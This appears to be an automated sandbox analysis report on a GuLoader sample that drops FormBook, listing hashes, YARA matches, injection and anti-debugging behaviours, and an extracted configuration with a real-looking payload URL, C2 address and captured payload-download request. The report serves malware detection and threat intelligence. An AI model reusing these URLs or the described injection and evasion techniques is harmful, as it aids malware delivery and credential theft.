Play interactive tour

Edit tour

Windows Analysis Report ZGNX11JMSc.exe

Overview

General Information

Sample Name:	ZGNX11JMSc.exe
Analysis ID:	448876
MD5:	fcfb0ec70f1419ede8a534cc95cb61e9
SHA1:	d3b529d77f1de00d63a75b3956d4bcf6bbce30ca
SHA256:	ff1b034c7060724133c6df0aa8cf5411ec0e6775d3aca83a127617340a8c588a
Tags:	32exeGuLoadertrojan
Infos:
Most interesting Screenshot:

Detection

GuLoader FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

GuLoader behavior detected

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Yara detected Generic Dropper

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

PE / OLE file has an invalid certificate

PE file contains strange resources

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

ZGNX11JMSc.exe (PID: 3152 cmdline: 'C:\Users\user\Desktop\ZGNX11JMSc.exe' MD5: FCFB0EC70F1419EDE8A534CC95CB61E9)

ZGNX11JMSc.exe (PID: 5880 cmdline: 'C:\Users\user\Desktop\ZGNX11JMSc.exe' MD5: FCFB0EC70F1419EDE8A534CC95CB61E9)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.yellow-wink.com/nff/"], "decoy": ["shinseikai.site", "creditmystartup.com", "howtovvbucks.com", "betterfromthebeginning.com", "oubacm.com", "stonalogov.com", "gentrypartyof8.com", "cuesticksandsupplies.com", "joelsavestheday.com", "llanobnb.com", "ecclogic.com", "miempaque.com", "cai23668.com", "miscdr.net", "twzhhq.com", "bloomandbrewcafe.com", "angcomleisure.com", "mafeeboutique.com", "300coin.club", "brooksranchhomes.com", "konversiondigital.com", "dominivision.com", "superiorshinedetailing.net", "thehomechef.global", "dating-web.site", "gcbsclubc.com", "mothererph.com", "pacleanfuel.com", "jerseryshorenflflagfootball.com", "roberthyatt.com", "wwwmacsports.com", "tearor.com", "american-ai.com", "mkyiyuan.com", "gempharmatechllc.com", "verdijvtc.com", "zimnik-bibo.one", "heatherdarkauthor.net", "dunn-labs.com", "automotivevita.com", "bersatubagaidulu.com", "gorillarecruiting.com", "mikecdmusic.com", "femuveewedre.com", "onyxmodsllc.com", "ooweesports.com", "dezeren.com", "foeweifgoor73dz.com", "sorchaashe.com", "jamiitulivu.com", "jifengshijie.com", "ranchfiberglas.com", "glendalesocialmediaagency.com", "icuvietnam.com", "404hapgood.com", "planetturmeric.com", "danfrem.com", "amazonautomationbusiness.com", "switchfinder.com", "diversifiedforest.com", "findnehomes.com", "rsyueda.com", "colombianmatrimony.com", "evan-dawson.info"]}

Threatname: GuLoader

{"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
ZGNX11JMSc.exe	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.623756181.0000000002240000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000024.00000000.621430446.0000000000401000.00000020.00020000.sdmp	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
00000001.00000000.213217103.0000000000401000.00000020.00020000.sdmp	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
00000001.00000002.623260641.0000000000401000.00000020.00020000.sdmp	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
Process Memory Space: ZGNX11JMSc.exe PID: 5880	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
1.0.ZGNX11JMSc.exe.400000.0.unpack	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
36.0.ZGNX11JMSc.exe.400000.0.unpack	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
1.2.ZGNX11JMSc.exe.400000.0.unpack	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: ZGNX11JMSc.exe	Malware Configuration Extractor: GuLoader {"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}
Source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp	Malware Configuration Extractor: FormBook {"C2 list": ["www.yellow-wink.com/nff/"], "decoy": ["shinseikai.site", "creditmystartup.com", "howtovvbucks.com", "betterfromthebeginning.com", "oubacm.com", "stonalogov.com", "gentrypartyof8.com", "cuesticksandsupplies.com", "joelsavestheday.com", "llanobnb.com", "ecclogic.com", "miempaque.com", "cai23668.com", "miscdr.net", "twzhhq.com", "bloomandbrewcafe.com", "angcomleisure.com", "mafeeboutique.com", "300coin.club", "brooksranchhomes.com", "konversiondigital.com", "dominivision.com", "superiorshinedetailing.net", "thehomechef.global", "dating-web.site", "gcbsclubc.com", "mothererph.com", "pacleanfuel.com", "jerseryshorenflflagfootball.com", "roberthyatt.com", "wwwmacsports.com", "tearor.com", "american-ai.com", "mkyiyuan.com", "gempharmatechllc.com", "verdijvtc.com", "zimnik-bibo.one", "heatherdarkauthor.net", "dunn-labs.com", "automotivevita.com", "bersatubagaidulu.com", "gorillarecruiting.com", "mikecdmusic.com", "femuveewedre.com", "onyxmodsllc.com", "ooweesports.com", "dezeren.com", "foeweifgoor73dz.com", "sorchaashe.com", "jamiitulivu.com", "jifengshijie.com", "ranchfiberglas.com", "glendalesocialmediaagency.com", "icuvietnam.com", "404hapgood.com", "planetturmeric.com", "danfrem.com", "amazonautomationbusiness.com", "switchfinder.com", "diversifiedforest.com", "findnehomes.com", "rsyueda.com", "colombianmatrimony.com", "evan-dawson.info"]}

Multi AV Scanner detection for submitted file

Show sources

Source: ZGNX11JMSc.exe

Virustotal: Detection: 20%

Perma Link

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY

Source: ZGNX11JMSc.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: netstat.pdbGCTL source: ZGNX11JMSc.exe, 00000024.00000003.1041284039.0000000000A58000.00000004.00000001.sdmp
Source:	Binary string: netstat.pdb source: ZGNX11JMSc.exe, 00000024.00000003.1041284039.0000000000A58000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: ZGNX11JMSc.exe, 00000024.00000002.1048163880.000000001E120000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: ZGNX11JMSc.exe
Source:	Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: ZGNX11JMSc.exe

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: www.yellow-wink.com/nff/
Source: Malware configuration extractor	URLs: http://ceattire.com/bin_UYDMbHwI28.bin

Source: Joe Sandbox View

ASN Name: SERVERIR SERVERIR

Source: global traffic

HTTP traffic detected: GET /bin_UYDMbHwI28.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ceattire.comCache-Control: no-cache

Source: global traffic

HTTP traffic detected: GET /bin_UYDMbHwI28.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ceattire.comCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: ceattire.com

Source: ZGNX11JMSc.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: ZGNX11JMSc.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: ZGNX11JMSc.exe, 00000024.00000002.1042870245.0000000000A21000.00000004.00000020.sdmp	String found in binary or memory: http://ceattire.com/
Source: ZGNX11JMSc.exe, 00000024.00000003.1040714283.0000000000A36000.00000004.00000001.sdmp	String found in binary or memory: http://ceattire.com/bin_UYDMbHwI28.bin
Source: ZGNX11JMSc.exe, 00000024.00000002.1042829626.00000000009F8000.00000004.00000020.sdmp	String found in binary or memory: http://ceattire.com/bin_UYDMbHwI28.binI
Source: ZGNX11JMSc.exe, 00000024.00000002.1042829626.00000000009F8000.00000004.00000020.sdmp	String found in binary or memory: http://ceattire.com/bin_UYDMbHwI28.binK
Source: ZGNX11JMSc.exe, 00000024.00000002.1042870245.0000000000A21000.00000004.00000020.sdmp	String found in binary or memory: http://ceattire.com/o
Source: ZGNX11JMSc.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: ZGNX11JMSc.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: ZGNX11JMSc.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: ZGNX11JMSc.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: ZGNX11JMSc.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: ZGNX11JMSc.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: ZGNX11JMSc.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: ZGNX11JMSc.exe	String found in binary or memory: https://www.digicert.com/CPS0

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022468CC NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_0224879F NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02248C82 NtSetInformationThread,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022454E5 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022442CD NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02241B1A NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02241B5F NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02244B8E NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022443F1 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02247036 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02244071 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02242958 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02241E2C NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02244785 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_0224341B NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02248CD5 NtSetInformationThread,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_0224251E NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02248D58 NtSetInformationThread,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022455AC NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1896E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1897A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1898F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1899A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1895D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189A10 NtQuerySection,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189650 NtQueryValueKey,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1896D0 NtCreateKey,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E18A710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189B00 NtSetValueKey,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189770 NtSetInformationFile,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E18A770 NtOpenThread,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189760 NtOpenProcess,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E18A3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189FE0 NtCreateMutant,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189820 NtEnumerateKey,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E18B040 NtSuspendThread,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1898A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E18AD30 NtSetContextThread,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189950 NtQueueApcThread,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E189560 NtWriteFile,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1899D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1895F0 NtQueryInformationFile,

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022408FD
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022468CC
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022458C9
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02248C82
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022454E5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022404CA
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022472C3
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022442CD
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02241B2D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02241B1A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02247B73
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02241B5F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02248385
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02244B8E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02243B9A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022443F1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02247036
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_0224100E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_0224881D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02244071
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02240845
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022408B3
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022408E2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022420E3
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022458F8
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022480D4
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_0224790A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02247153
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02242958
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022429B0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022451BE
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02242183
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02241E2C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02240610
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_0224767B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02243E5E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022476B2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02243EC4
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02247F03
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02243F0C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02247F6D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02240FB5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02244785
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02240C24
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_0224341B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02248446
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02243C4E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02243CF0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022434C4
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02248CD5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_0224350F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_0224251E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02247D52
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02248D58
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02240D83
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02240D9C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02245DCA
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E166E30
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17EBB0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E15841F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E201002
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E15B090
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E14F900
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E140D20
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E164120
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E211D55
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E15D5E0

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe

Code function: String function: 1E14B150 appears 32 times

Source: ZGNX11JMSc.exe

Static PE information: invalid certificate

Source: ZGNX11JMSc.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ZGNX11JMSc.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ZGNX11JMSc.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: ZGNX11JMSc.exe, 00000001.00000000.213248229.0000000000438000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameANTISOCIA.exe vs ZGNX11JMSc.exe
Source: ZGNX11JMSc.exe, 00000024.00000002.1048619295.000000001E3CF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ZGNX11JMSc.exe
Source: ZGNX11JMSc.exe, 00000024.00000003.1041284039.0000000000A58000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenetstat.exej% vs ZGNX11JMSc.exe
Source: ZGNX11JMSc.exe, 00000024.00000002.1042709063.00000000009A0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs ZGNX11JMSc.exe
Source: ZGNX11JMSc.exe, 00000024.00000000.621492297.0000000000438000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameANTISOCIA.exe vs ZGNX11JMSc.exe
Source: ZGNX11JMSc.exe	Binary or memory string: OriginalFilenameANTISOCIA.exe vs ZGNX11JMSc.exe

Source: ZGNX11JMSc.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
